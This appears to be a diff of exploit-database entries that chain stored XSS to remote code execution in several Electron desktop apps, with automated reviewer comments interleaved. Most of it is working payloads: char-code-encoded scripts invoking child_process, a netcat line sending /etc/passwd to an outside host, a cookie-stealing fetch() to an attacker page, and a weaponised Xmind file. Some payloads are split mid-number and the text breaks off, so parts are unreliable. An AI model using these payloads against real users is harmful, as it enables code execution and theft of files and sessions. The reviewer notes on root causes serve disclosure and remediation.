Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 180
Origin: http://demo.egavilanmedia.com
Connection: close
Referer: http://demo.egavilanmedia.com/User%20Registration%20and%20Login%20System%20With%20Admin%20Panel/admin/profile.php
Cookie: PHPSESSID=944b2es2eb67f971af305b2105e35c3e
fullname=admin&username=<script>alert(document.cookie)</script>&email=<script>alert('PoC 2')</script>&gender==<script>alert('PoC 3')</script>&action=update_admin
6. Forward the request and refresh the page. You'll receive three different XSS pop-ups. One of them contains the PHPSESSID cookie. By using payloads like <BODY ONLOAD=fetch(`http://attackers-page.com/${document.cookie}`)>, the session cookies can be send to the attacker.
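Review bot: the captured request has `gender==<script>...` with a doubled `=`, so the stored gender value begins with `=`; this looks like a transcription slip. The `Cookie: PHPSESSID=...` value in the sample request is a session identifier and should be a placeholder. The entry states the filter is client-side only, and that is the actual finding: the fix is server-side validation in `profile_action.php` plus output encoding where the profile fields are rendered, and setting `HttpOnly` on `PHPSESSID` would keep `document.cookie` from exposing it as the final step shows. The `Tested on` header line also lacks the `Tested on:` form the other header lines use.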


@ -0,0 +1,29 @@
# Exploit Title: Markdown Explorer 0.1.1 - XSS to RCE
# Exploit Author: TaurusOmar
# Date: 04/05/2021
# CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
# Risk: High (8.8)
# Vendor Homepage: https://github.com/jersou/markdown-explorer
# Version: 0.1.1
# Tested on: Windows, Linux, MacOs
# Software Description:
Easily explore, view and edit markdown documentation of a file tree.
If your projects documentation is written in Markdown, with md files dispersed throughout your project tree, Markdown Explorer displays md files in a tree structure, and it allows filtering by file name or by file content.
Just drop a folder on the window (or click on the folder icon on top left) to show the Markdown documentation of this folder. Then, explore the tree on the left, and toggle view/edit mode on md file with the button on the top right.
# Vulnerability Description:
The software allows you to store payloads within its own editor, as well as upload (.md) files once malicious code is entered, the payload will be executed immediately.
The attacker can send a malicious file with the payload, when this file is opened, the chain will be executed successfully giving access to
the remote attacker to get remote execution on the computer.
#Proof
https://imgur.com/a/w4bcPWs
# Payload : exec(Attacker Reverse netcat stolen => /etc/passwd) && exec(calc)
[<audio src=x onerror=writeln(String.fromCharCode(10,60,97,117,100,105,111,32,115,114,99,61,120,32,111,110,101,114,114,111,114,61,34,99,111,110,115,116,32,101,120,101,99,61,32,114,101,113,117,105,114,101,40,39,99,104,105,108,100,95,112,114,111,99,101,115,115,39,41,46,101,120,101,99,59,10,101,120,101,99,40,39,110,99,32,45,119,32,51,32,49,57,50,46,49,54,56,46,49,49,49,46,49,50,57,32,49,51,51,55,32,60,32,47,101,116,99,47,112,97,115,115,119,100,39,44,32,40,101,44,32,115,116,100,111,117,116,44,32,115,116,100,101,114,114,41,61,62,32,123,32,105,102,32,40,101,32,105,110,115,116,97,110,99,101,111,102,32,69,114,114,111,114,41,32,123,10,99,111,110,115,111,108,101,46,101,114,114,111,114,40,101,41,59,32,116,104,114,111,119,32,101,59,32,125,32,99,111,110,115,111,108,101,46,108,111,103,40,39,115,116,100,111,117,116,32,39,44,32,115,116,100,111,117,116,41,59,10,99,111,110,115,111,108,101,46,108,111,103,40,39,115,116,100,101,114,114,32,39,44,32,115,116,100,101,114,114,41,59,125,41,59,10,97,108,101,114,116,40,39,49,39,41,34,62,60,115,99,114,105,112,116,62,10,118,97,114,32,80,114,111,99,101,115,115,32,61,32,112,114,111,99,101,115,115,46,98,105,110,100,105,110,103,40,39,112,114,111,99,101,115,115,95,119,114,97,112,39,41,46,80,114,111,99,101,115,115,59,10,118,97,114,32,112,114,111,99,32,61,32,110,101,119,32,80,114,111,99,101,115,115,40,41,59,10,112,114,111,99,46,111,110,101,120,105,116,32,61,32,102,117,110,99,116,105,111,110,40,97,44,98,41,32,123,125,59,10,118,97,114,32,101,110,118,32,61,32,112,114,111,99,101,115,115,46,101,110,118,59,10,118,97,114,32,101,110,118,95,32,61,32,91,93,59,10,102,111,114,32,40,118,97,114,32,107,101,121,32,105,110,32,101,110,118,41,32,101,110,118,95,46,112,117,115,104,40,107,101,121,43,39,61,39,43,101,110,118,91,107,101,121,93,41,59,10,112,114,111,99,46,115,112,97,119,110,40,123,102,105,108,101,58,39,47,117,115,114,47,98,105,110,47,103,110,111,109,101,45,99,97,108,99,117,108,97,116,111,114,39,44,99,119,100,58,110,117,108,108,44,119,105,110,100,111,119,115,86,10
1,114,98,97,116,105,109,65,114,103,117,109,101,110,116,115,58,102,97,108,115,101,44,100,101,116,97,99,104,101,100,58,102,97,108,115,101,44,101,110,118,80,97,105,114,115,58,101,110,118,95,44,115,116,100,105,111,58,91,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,44,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,44,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,93,125,41,59,10,60,47,115,99,114,105,112,116,62))>](http://)
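Review bot: the char-code payload is split across two lines mid-number (`...,86,10` then `1,114,...`), so the markdown line as committed is not the string the author tested; keep it on one line or attach it as a file. The only proof is an imgur link, and there is no CVE or vendor reference. What the payload demonstrates is that `require('child_process')` and `process.binding('process_wrap')` are reachable from rendered markdown, i.e. the Electron renderer runs with Node integration on and without context isolation; the header should name that as the root cause, because disabling `nodeIntegration`, enabling `contextIsolation` and sanitizing rendered HTML is the fix the maintainer needs, not handling of the XSS alone.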


@ -0,0 +1,59 @@
# Exploit Title: Xmind 2020 - XSS to RCE
# Exploit Author: TaurusOmar
# Date: May 4th, 2021
# CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
# Risk: High (8.8)
# Vendor Homepage: https://www.xmind.net/
# Version: 2020
# Tested on: Windows, Linux, MacOs
# Software Description:
XMind, a full-featured mind mapping and brainstorming tool, designed to generate ideas, inspire creativity, brings efficiency both in work and life. Millions and millions of WFH people love it.
Many great products start with a small idea. Mind map can really be useful at the beginning of a project. Use it to record every idea in the meeting, you might be surprised by the difference and achievement it makes in the long run.
# Vulnerability Description:
The software allows you to store payloads in the form of files or as custom header titles, once the malicious code is entered, the payload will be executed when the victim moves the mouse or clicks.
The attacker can send a malicious file with the payload, when this file is opened, the chain will be executed successfully giving access to the
the remote attacker to get remote execution on the computer.
#Proof video
https://imgur.com/a/t96Nxo5
# Payload 2: exec(/etc/passwd)
#Decode Payload
<script>
const { spawn } = require("child_process");
const cat = spawn("cat", ["/etc/passwd"]);
cat.stdout.on("data", data => {
alert(`stdout: ${data}`);
});</script>
#Encode Payload
<img src=x onerror=writeln(String.fromCharCode(60,115,99,114,105,112,116,62,10,99,111,110,115,116,32,123,32,115,112,97,119,110,32,125,32,61,32,114,101,113,117,105,114,101,40,34,99,104,105,108,100,95,112,114,111,99,101,115,115,34,41,59,10,99,111,110,115,116,32,99,97,116,32,61,32,115,112,97,119,110,40,34,99,97,116,34,44,32,91,34,47,101,116,99,47,112,97,115,115,119,100,34,93,41,59,10,99,97,116,46,115,116,100,111,117,116,46,111,110,40,34,100,97,116,97,34,44,32,100,97,116,97,32,61,62,32,123,10,32,32,32,32,97,108,101,114,116,40,96,115,116,100,111,117,116,58,32,36,123,100,97,116,97,125,96,41,59,10,125,41,59,60,47,115,99,114,105,112,116,62))>
# Payload 2: exec(calc)
#Decode Payload
<script>
var Process = process.binding('process_wrap').Process;
var proc = new Process();
proc.onexit = function(a,b) {};
var env = process.env;
var env_ = [];
for (var key in env) env_.push(key+'='+env[key]);
proc.spawn({file:'/usr/bin/gnome-calculator',cwd:null,windowsVerbatimArguments:false,detached:false,envPairs:env_,stdio:[{type:'ignore'},{type:'ignore'},{type:'ignore'}]});
</script>
#Encode Payload
<img src=x onerror=writeln(String.fromCharCode(60,115,99,114,105,112,116,62,10,118,97,114,32,80,114,111,99,101,115,115,32,61,32,112,114,111,99,101,115,115,46,98,105,110,100,105,110,103,40,39,112,114,111,99,101,115,115,95,119,114,97,112,39,41,46,80,114,111,99,101,115,115,59,10,118,97,114,32,112,114,111,99,32,61,32,110,101,119,32,80,114,111,99,101,115,115,40,41,59,10,112,114,111,99,46,111,110,101,120,105,116,32,61,32,102,117,110,99,116,105,111,110,40,97,44,98,41,32,123,125,59,10,118,97,114,32,101,110,118,32,61,32,112,114,111,99,101,115,115,46,101,110,118,59,10,118,97,114,32,101,110,118,95,32,61,32,91,93,59,10,102,111,114,32,40,118,97,114,32,107,101,121,32,105,110,32,101,110,118,41,32,101,110,118,95,46,112,117,115,104,40,107,101,121,43,39,61,39,43,101,110,118,91,107,101,121,93,41,59,10,112,114,111,99,46,115,112,97,119,110,40,123,102,105,108,101,58,39,47,117,115,114,47,98,105,110,47,103,110,111,109,101,45,99,97,108,99,117,108,97,116,111,114,39,44,99,119,100,58,110,117,108,108,44,119,105,110,100,111,119,115,86,101,114,98,97,116,105,109,65,114,103,117,109,101,110,116,115,58,102,97,108,115,101,44,100,101,116,97,99,104,101,100,58,102,97,108,115,101,44,101,110,118,80,97,105,114,115,58,101,110,118,95,44,115,116,100,105,111,58,91,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,44,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,44,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,93,125,41,59,10,60,47,115,99,114,105,112,116,62))>
# File Malicious.json Payload
[{"id":"5609f1388fd8c10e8f8798f104","class":"sheet","title":"Map 1","rootTopic":{"id":"b9aa22deba98b3b20c7ac8aca2","class":"topic","title":"\">'><img src=x onerror=writeln(String.fromCharCode(60,115,99,114,105,112,116,62,10,108,101,116,32,123,32,115,112,97,119,110,32,125,32,61,32,114,101,113,117,105,114,101,40,34,99,104,105,108,100,95,112,114,111,99,101,115,115,34,41,59,10,108,101,116,32,108,115,32,61,32,115,112,97,119,110,40,34,108,115,34,44,32,91,34,45,108,97,34,93,41,59,10,108,115,46,115,116,100,111,117,116,46,111,110,40,34,100,97,116,97,34,44,32,100,97,116,97,32,61,62,32,123,10,32,32,32,32,97,108,101,114,116,40,96,115,116,100,111,117,116,58,32,36,123,100,97,116,97,125,96,41,59,125,41,59,60,47,115,99,114,105,112,116,62,10,10))>","structureClass":"org.xmind.ui.map.unbalanced","children":{"attached":[{"id":"b58888b5ceebbf0e68dada0656","title":"Main Topic 1","titleUnedited":true},{"id":"193b56735e689ae86a01d91513","title":"Main Topic 2","titleUnedited":true},{"id":"67ddbcb1-85c9-4478-a0aa-580e9fdcd971","title":"Main Topic 3","titleUnedited":true}]},"extensions":[{"content":[{"content":"3","name":"right-number"}],"provider":"org.xmind.ui.map.unbalanced"}]},"theme":{"id":"c669ec6d4d48895260d968fc99","importantTopic":{"type":"topic","properties":{"fo:font-weight":"bold","fo:color":"#2b2b2b","svg:fill":"#FFDC34"}},"minorTopic":{"type":"topic","properties":{"fo:font-weight":"bold","fo:color":"#2b2b2b","svg:fill":"#AB9738"}},"expiredTopic":{"type":"topic","properties":{"fo:font-style":"italic","fo:text-decoration":" 
line-through"}},"centralTopic":{"type":"topic","styleId":"9a13b7d6-cd05-44c3-b903-6c3a50edc46e","properties":{"shape-class":"org.xmind.topicShape.roundedRect","svg:fill":"#1B1B1D","fo:font-family":"Montserrat","fo:font-weight":"600","fo:font-style":"normal","line-width":"3","line-color":"#292929","border-line-width":"0"}},"map":{"type":"map","styleId":"f0e1f9bb-a8f5-486a-a70a-b72b2b6560d3","properties":{"svg:fill":"#000000"}},"subTopic":{"type":"topic","styleId":"9ea90eed-1da0-4c93-bac4-2085e16a0faf","properties":{"fo:font-family":"Montserrat","svg:fill":"#636366","shape-class":"org.xmind.topicShape.roundedRect","fo:font-size":"14pt","fo:text-align":"left","border-line-width":"0","fo:color":"#FFFFFF"}},"mainTopic":{"type":"topic","styleId":"42065f7f-018c-4eb9-9dc7-3a7bbf464915","properties":{"fo:font-family":"Montserrat","svg:fill":"#3A3A3C","border-line-width":"0","fo:font-weight":"600","fo:font-style":"normal","fo:font-size":"18pt","fo:text-align":"left","fo:color":"#FFFFFF","line-width":"2"}},"summaryTopic":{"type":"topic","styleId":"c8f4c32b-2607-4fae-bb85-b8736039e941","properties":{"fo:font-family":"Montserrat","svg:fill":"#8E8E93","fo:font-weight":"500","fo:font-style":"normal","line-color":"#292929","border-line-width":"0"}},"calloutTopic":{"type":"topic","styleId":"6f8bd667-fb82-4d0d-899f-05dc76c5945e","properties":{"fo:font-family":"Montserrat","svg:fill":"#8E8E93","fo:font-size":"14pt","fo:font-weight":"500","fo:font-style":"normal"}},"floatingTopic":{"type":"topic","styleId":"c9509bc2-2641-4f5f-8b38-e62c14c907f9","properties":{"fo:font-family":"Montserrat","border-line-width":"0","fo:font-weight":"500","fo:font-style":"normal","line-width":"2","line-color":"#292929"}},"boundary":{"type":"boundary","styleId":"0d7cf959-3b54-4849-88e1-cc0fc8c60341","properties":{"svg:fill":"#545455","shape-class":"org.xmind.boundaryShape.roundedRect","line-color":"#5D5D60","fo:font-weight":"500","fo:font-style":"normal","fo:color":"#FFFFFF","fo:font-size":"13pt","fo:font-fa
mily":"Montserrat"}},"relationship":{"type":"relationship","styleId":"57da2f8e-3f8d-47ee-a802-93023fc802c1","properties":{"line-color":"#8E8E93","line-width":"2","fo:font-weight":"500","fo:font-style":"normal","fo:font-family":"Montserrat","fo:color":"#FFFFFF","fo:font-size":"13pt"}},"summary":{"type":"summary","styleId":"ddeb9d94-1678-4129-8796-42b036e08dd2","properties":{"line-color":"#5A5A5A"}}},"topicPositioning":"fixed"}]


@ -0,0 +1,55 @@
# Exploit Title: Tagstoo 2.0.1 - Stored XSS to RCE
# Exploit Author: TaurusOmar
# Date: 04/05/2021
# CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
# Risk: High (8.8)
# Vendor Homepage: https://tagstoo.sourceforge.io/
# Version: v2.0.1
# Tested on: Windows, Linux, MacOs
# Software Description:
Software to tag folders and files, with multimedia and epubs preview.
You can export data with the tagging information to a file, as backup or to import it in any computer.
# Vulnerability Description:
The software allows you to store payloads in the form of files or custom tags, once the malicious code is entered, the payload will be executed immediately.
The attacker can send a malicious file with the payload, when this file is opened, the chain will be executed successfully giving access to the
the remote attacker to get remote execution on the computer or directly open the folder in the program.
# Proof video
https://imgur.com/a/smeAjaW
# Payload 1: exec(calc)
#Decode Payload
<script>
var Process = process.binding('process_wrap').Process;
var proc = new Process();
proc.onexit = function(a,b) {};
var env = process.env;
var env_ = [];
for (var key in env) env_.push(key+'='+env[key]);
proc.spawn({file:'/usr/bin/gnome-calculator',cwd:null,windowsVerbatimArguments:false,detached:false,envPairs:env_,stdio:[{type:'ignore'},{type:'ignore'},{type:'ignore'}]});
</script>
#Encode Payload
<img src=x onerror=writeln(String.fromCharCode(60,115,99,114,105,112,116,62,10,118,97,114,32,80,114,111,99,101,115,115,32,61,32,112,114,111,99,101,115,115,46,98,105,110,100,105,110,103,40,39,112,114,111,99,101,115,115,95,119,114,97,112,39,41,46,80,114,111,99,101,115,115,59,10,118,97,114,32,112,114,111,99,32,61,32,110,101,119,32,80,114,111,99,101,115,115,40,41,59,10,112,114,111,99,46,111,110,101,120,105,116,32,61,32,102,117,110,99,116,105,111,110,40,97,44,98,41,32,123,125,59,10,118,97,114,32,101,110,118,32,61,32,112,114,111,99,101,115,115,46,101,110,118,59,10,118,97,114,32,101,110,118,95,32,61,32,91,93,59,10,102,111,114,32,40,118,97,114,32,107,101,121,32,105,110,32,101,110,118,41,32,101,110,118,95,46,112,117,115,104,40,107,101,121,43,39,61,39,43,101,110,118,91,107,101,121,93,41,59,10,112,114,111,99,46,115,112,97,119,110,40,123,102,105,108,101,58,39,47,117,115,114,47,98,105,110,47,103,110,111,109,101,45,99,97,108,99,117,108,97,116,111,114,39,44,99,119,100,58,110,117,108,108,44,119,105,110,100,111,119,115,86,101,114,98,97,116,105,109,65,114,103,117,109,101,110,116,115,58,102,97,108,115,101,44,100,101,116,97,99,104,101,100,58,102,97,108,115,101,44,101,110,118,80,97,105,114,115,58,101,110,118,95,44,115,116,100,105,111,58,91,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,44,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,44,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,93,125,41,59,10,60,47,115,99,114,105,112,116,62))>
# Payload 2: exec(netcat remote stolen file => /etc/passwd)
#Decode Payload
<audio src=x onerror="const exec= require('child_process').exec;
exec('nc -w 3 192.168.111.129 1337 < /etc/passwd', (e, stdout, stderr)=> { if (e instanceof Error) {
console.error(e); throw e; } console.log('stdout ', stdout);
console.log('stderr ', stderr);});
alert('1')">
#Encode Payload
<img src=x onerror=writeln(String.fromCharCode(10,60,97,117,100,105,111,32,115,114,99,61,120,32,111,110,101,114,114,111,114,61,34,99,111,110,115,116,32,101,120,101,99,61,32,114,101,113,117,105,114,101,40,39,99,104,105,108,100,95,112,114,111,99,101,115,115,39,41,46,101,120,101,99,59,10,101,120,101,99,40,39,110,99,32,45,119,32,51,32,49,57,50,46,49,54,56,46,49,49,49,46,49,50,57,32,49,51,51,55,32,60,32,47,101,116,99,47,112,97,115,115,119,100,39,44,32,40,101,44,32,115,116,100,111,117,116,44,32,115,116,100,101,114,114,41,61,62,32,123,32,105,102,32,40,101,32,105,110,115,116,97,110,99,101,111,102,32,69,114,114,111,114,41,32,123,10,99,111,110,115,111,108,101,46,101,114,114,111,114,40,101,41,59,32,116,104,114,111,119,32,101,59,32,125,32,99,111,110,115,111,108,101,46,108,111,103,40,39,115,116,100,111,117,116,32,39,44,32,115,116,100,111,117,116,41,59,10,99,111,110,115,111,108,101,46,108,111,103,40,39,115,116,100,101,114,114,32,39,44,32,115,116,100,101,114,114,41,59,125,41,59,10,97,108,101,114,116,40,39,49,39,41,34,62))>
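Review bot: the vulnerability description gives no root cause, no fix and no vendor-response status. Both payloads depend on Node APIs being reachable from the rendering context (`process.binding('process_wrap')` in Payload 1, `require('child_process')` in Payload 2), which is what turns a stored XSS in a tag or file name into code execution; the advisory should say that the renderer exposes Node to untrusted content and name the remediation (stop exposing Node APIs to rendered content, and HTML-encode tag and file names before they reach the DOM).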


@ -0,0 +1,26 @@
# Exploit Title: SnipCommand 0.1.0 - XSS to RCE
# Exploit Author: TaurusOmar
# Date: 04/05/2021
# CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
# Risk: High (8.8)
# Vendor Homepage: https://github.com/gurayyarar/SnipCommand
# Version: 0.1.0
# Tested on: Windows, Linux, MacOs
# Software Description:
Open source command snippets manager for organize and copy fast.
It helps you create, organize and store your commands (Excel formulas, Sql Queries, Terminal commands, etc.) with dynamic parameters for quick copy to it. Describe your commands with dynamic parameters also support documentation about your snippets. You can select or specify your dynamic values using with selectbox/inputbox for ready to paste the workspace. You can organize with tags.
# Vulnerability Description:
The software allows you to store payloads in the form of files or as titles in their dynamic values, once the malicious code is entered, the payload will be executed immediately.
The attacker can send a malicious file with the payload, when this file is opened, the chain will be executed successfully giving access to the
the remote attacker to get remote execution on the computer.
#Proof video
https://imgur.com/a/I2reH1M
# Payload: exec(Attacker Reverse netcat stolen => /etc/passwd) && exec(calc)
<audio src=x onerror=writeln(String.fromCharCode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


@ -0,0 +1,28 @@
# Exploit Title: Moeditor 0.2.0 - Persistent Cross-Site Scripting
# Exploit Author: TaurusOmar
# Date: 04/05/2021
# CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
# Risk: High (8.8)
# Vendor Homepage: https://moeditor.js.org/
# Version: 0.2.0
# Tested on: Windows, Linux, MacOs
# Software Description:
Software to view and edit sales documentation
Moeditor shows the md files in its editor allows to carry out projects easily, you can open your own files or share with other users
# Vulnerability Description:
The software allows you to store payloads within its own editor, as well as upload (.md) files once malicious code is entered, the payload will be executed immediately.
The attacker can send a malicious file with the payload, when this file is opened, the chain will be executed successfully giving access to
the remote attacker to get remote execution on the computer.
#Proof video
https://imgur.com/a/UdP4JaX
# Payload : exec(Attacker Reverse netcat stolen => /etc/passwd) && exec(calc)
[<audio src=x onerror=writeln(String.fromCharCode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http://)
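Review bot: the title says "Persistent Cross-Site Scripting", but the description, the payload label ("exec(Attacker Reverse netcat stolen => /etc/passwd) && exec(calc)") and the CVSS vector (C:H/I:H/A:H, 8.8) describe remote code execution, and the same title/impact mismatch repeats in the Marky, StudyMD, Freeter, Markright, Markdownify and Anote files below; pick one impact and make the title, CVSS and description agree. The "Software Description" ("view and edit sales documentation") also does not match the markdown editor described in the next sentence.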


@ -0,0 +1,28 @@
# Exploit Title: Marky 0.0.1 - Persistent Cross-Site Scripting
# Exploit Author: TaurusOmar
# Date: 04/05/2021
# CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
# Risk: High (8.8)
# Vendor Homepage: https://github.com/vesparny/marky
# Version: 0.0.1
# Tested on: Linux, MacOs, Windows
# Software Description:
Marky is an editor for markdown with a friendly interface that allows you to view, edit and load files (.md). Marky is still under development. You can download the latest version from the releases page.
# Vulnerability Description:
The software allows you to store payloads within its own editor, as well as upload (.md) files once malicious code is entered, the payload will be executed immediately.
The attacker can send a malicious file with the payload, when this file is opened, the chain will be executed successfully giving access to
the remote attacker to get remote execution on the computer.
#Proof Video
https://imgur.com/a/qclfrUx
# Payload : exec(Attacker Reverse netcat stolen => /etc/passwd) && exec(calc)
[<audio src=x onerror=writeln(String.fromCharCode(10,60,97,117,100,105,111,32,115,114,99,61,120,32,111,110,101,114,114,111,114,61,34,99,111,110,115,116,32,101,120,101,99,61,32,114,101,113,117,105,114,101,40,39,99,104,105,108,100,95,112,114,111,99,101,115,115,39,41,46,101,120,101,99,59,10,101,120,101,99,40,39,110,99,32,45,119,32,51,32,49,57,50,46,49,54,56,46,49,49,49,46,49,50,57,32,49,51,51,55,32,60,32,47,101,116,99,47,112,97,115,115,119,100,39,44,32,40,101,44,32,115,116,100,111,117,116,44,32,115,116,100,101,114,114,41,61,62,32,123,32,105,102,32,40,101,32,105,110,115,116,97,110,99,101,111,102,32,69,114,114,111,114,41,32,123,10,99,111,110,115,111,108,101,46,101,114,114,111,114,40,101,41,59,32,116,104,114,111,119,32,101,59,32,125,32,99,111,110,115,111,108,101,46,108,111,103,40,39,115,116,100,111,117,116,32,39,44,32,115,116,100,111,117,116,41,59,10,99,111,110,115,111,108,101,46,108,111,103,40,39,115,116,100,101,114,114,32,39,44,32,115,116,100,101,114,114,41,59,125,41,59,10,97,108,101,114,116,40,39,49,39,41,34,62,60,115,99,114,105,112,116,62,10,118,97,114,32,80,114,111,99,101,115,115,32,61,32,112,114,111,99,101,115,115,46,98,105,110,100,105,110,103,40,39,112,114,111,99,101,115,115,95,119,114,97,112,39,41,46,80,114,111,99,101,115,115,59,10,118,97,114,32,112,114,111,99,32,61,32,110,101,119,32,80,114,111,99,101,115,115,40,41,59,10,112,114,111,99,46,111,110,101,120,105,116,32,61,32,102,117,110,99,116,105,111,110,40,97,44,98,41,32,123,125,59,10,118,97,114,32,101,110,118,32,61,32,112,114,111,99,101,115,115,46,101,110,118,59,10,118,97,114,32,101,110,118,95,32,61,32,91,93,59,10,102,111,114,32,40,118,97,114,32,107,101,121,32,105,110,32,101,110,118,41,32,101,110,118,95,46,112,117,115,104,40,107,101,121,43,39,61,39,43,101,110,118,91,107,101,121,93,41,59,10,112,114,111,99,46,115,112,97,119,110,40,123,102,105,108,101,58,39,47,117,115,114,47,98,105,110,47,103,110,111,109,101,45,99,97,108,99,117,108,97,116,111,114,39,44,99,119,100,58,110,117,108,108,44,119,105,110,100,111,119,115,86,10
1,114,98,97,116,105,109,65,114,103,117,109,101,110,116,115,58,102,97,108,115,101,44,100,101,116,97,99,104,101,100,58,102,97,108,115,101,44,101,110,118,80,97,105,114,115,58,101,110,118,95,44,115,116,100,105,111,58,91,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,44,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,44,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,93,125,41,59,10,60,47,115,99,114,105,112,116,62))>](http://)


@ -0,0 +1,27 @@
# Exploit Title: StudyMD 0.3.2 - Persistent Cross-Site Scripting
# Exploit Author: TaurusOmar
# Date: 04/05/2021
# CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
# Risk: High (8.8)
# Vendor Homepage: https://github.com/jotron/StudyMD
# Version: 0.3.2
# Tested on: Windows, Linux, MacOs
# Software Description:
A cool app to study with markdown. Turns your Markdown-Summaries to Flashcard.
Allows user to create flash cards based on markdown files (.md) for easy viewing of their structure.
# Vulnerability Description:
The software allows you to store payloads within your flash card manager, as well as upload files (.md) once the malicious code is entered, the payload will be executed immediately. The attacker can send a malicious file with the payload, when this file is opened, the chain will be executed successfully giving access to the
the remote attacker to get remote execution on the computer.
#Proof Video
https://imgur.com/a/lDHKEIp
# Payload: exec(AttackerReverse netcat stolen => /etc/passwd) && exec(calc)
[<audio src=x onerror=writeln(String.fromCharCode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http://)


@ -0,0 +1,27 @@
# Exploit Title: Freeter 1.2.1 - Persistent Cross-Site Scripting
# Exploit Author: TaurusOmar
# Date: 04/05/2021
# CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
# Risk: High (8.8)
# Vendor Homepage: https://freeter.io/
# Version: 1.2.1
# Tested on: Windows, Linux, MacOs
# Software Description:
It is an organizer for design, it allows you to work on as many projects as you want. with project drop-down menu facilities to switch between them easily.
integrates widgets to set up a dashboard, giving you quick access to everything you need to work on a project.
# Vulnerability Description:
The software allows you to store payloads in the form of files or as custom widget titles, once the malicious code is entered, the payload will be executed when the victim moves the mouse or clicks.
The attacker can send a malicious file with the payload, when this file is opened, the chain will be executed successfully giving access to
the remote attacker to get remote execution on the computer.
#Proof Video
https://imgur.com/a/iBuKWm4
# Payload 2: exec(Attacker Reverse netcat stolen => /etc/passwd) && exec(calc)
<audio src=x onerror=writeln(String.fromCharCode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


@ -0,0 +1,26 @@
# Exploit Title: Markright 1.0 - Persistent Cross-Site Scripting
# Exploit Author: TaurusOmar
# Date: 04/05/2021
# CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
# Risk: High (8.8)
# Vendor Homepage: https://github.com/dvcrn/markright
# Version: 1.0
# Tested on: Linux, MacOs,Windows
# Software Description:
A minimalist discount editor with github flavor, it allows to view, edit and load files with markdown extension (.md) quickly and with a friendly interface.
# Vulnerability Description:
The software allows you to store payloads within its own editor, as well as upload (.md) files once malicious code is entered, the payload will be executed immediately.The attacker can send a malicious file with the payload, when this file is opened, the chain will be executed successfully giving access to
the remote attacker to get remote execution on the computer.
#Proof video
https://imgur.com/a/VOsgKbZ
# Payload: exec(Attacker Reverse netcat stolen => /etc/passwd) && exec(calc)
[<audio src=x onerror=writeln(String.fromCharCode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http://)


@ -0,0 +1,25 @@
# Exploit Title: Markdownify 1.2.0 - Persistent Cross-Site Scripting
# Exploit Author: TaurusOmar
# Date: 04/05/2021
# CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
# Risk: High (8.8)
# Vendor Homepage: https://github.com/amitmerchant1990/electron-markdownify
# Version: 1.2.0
# Tested on: Windows, Linux, MacOs
# Software Description:
It is a lightweight editor for viewing and editing the markdown documentation of aYou can browse your personal folder to view and edit your files, change view / edit mode in md file with subject at the top.
# Vulnerability Description:
The software allows you to store payloads within its own editor, as well as upload (.md) files once malicious code is entered, the payload will be executed immediately. The attacker can send a malicious file with the payload, when this file is opened, the chain will be executed successfully giving access to the
the remote attacker to get remote execution on the computer.
#Proof
https://imgur.com/a/T4jBoiS
# Payload: exec(Attacker Reverse netcat stolen => /etc/passwd) && exec(calc)
[<audio src=x onerror=writeln(String.fromCharCode(10,60,97,117,100,105,111,32,115,114,99,61,120,32,111,110,101,114,114,111,114,61,34,99,111,110,115,116,32,101,120,101,99,61,32,114,101,113,117,105,114,101,40,39,99,104,105,108,100,95,112,114,111,99,101,115,115,39,41,46,101,120,101,99,59,10,101,120,101,99,40,39,110,99,32,45,119,32,51,32,49,57,50,46,49,54,56,46,49,49,49,46,49,50,57,32,49,51,51,55,32,60,32,47,101,116,99,47,112,97,115,115,119,100,39,44,32,40,101,44,32,115,116,100,111,117,116,44,32,115,116,100,101,114,114,41,61,62,32,123,32,105,102,32,40,101,32,105,110,115,116,97,110,99,101,111,102,32,69,114,114,111,114,41,32,123,10,99,111,110,115,111,108,101,46,101,114,114,111,114,40,101,41,59,32,116,104,114,111,119,32,101,59,32,125,32,99,111,110,115,111,108,101,46,108,111,103,40,39,115,116,100,111,117,116,32,39,44,32,115,116,100,111,117,116,41,59,10,99,111,110,115,111,108,101,46,108,111,103,40,39,115,116,100,101,114,114,32,39,44,32,115,116,100,101,114,114,41,59,125,41,59,10,97,108,101,114,116,40,39,49,39,41,34,62,60,115,99,114,105,112,116,62,10,118,97,114,32,80,114,111,99,101,115,115,32,61,32,112,114,111,99,101,115,115,46,98,105,110,100,105,110,103,40,39,112,114,111,99,101,115,115,95,119,114,97,112,39,41,46,80,114,111,99,101,115,115,59,10,118,97,114,32,112,114,111,99,32,61,32,110,101,119,32,80,114,111,99,101,115,115,40,41,59,10,112,114,111,99,46,111,110,101,120,105,116,32,61,32,102,117,110,99,116,105,111,110,40,97,44,98,41,32,123,125,59,10,118,97,114,32,101,110,118,32,61,32,112,114,111,99,101,115,115,46,101,110,118,59,10,118,97,114,32,101,110,118,95,32,61,32,91,93,59,10,102,111,114,32,40,118,97,114,32,107,101,121,32,105,110,32,101,110,118,41,32,101,110,118,95,46,112,117,115,104,40,107,101,121,43,39,61,39,43,101,110,118,91,107,101,121,93,41,59,10,112,114,111,99,46,115,112,97,119,110,40,123,102,105,108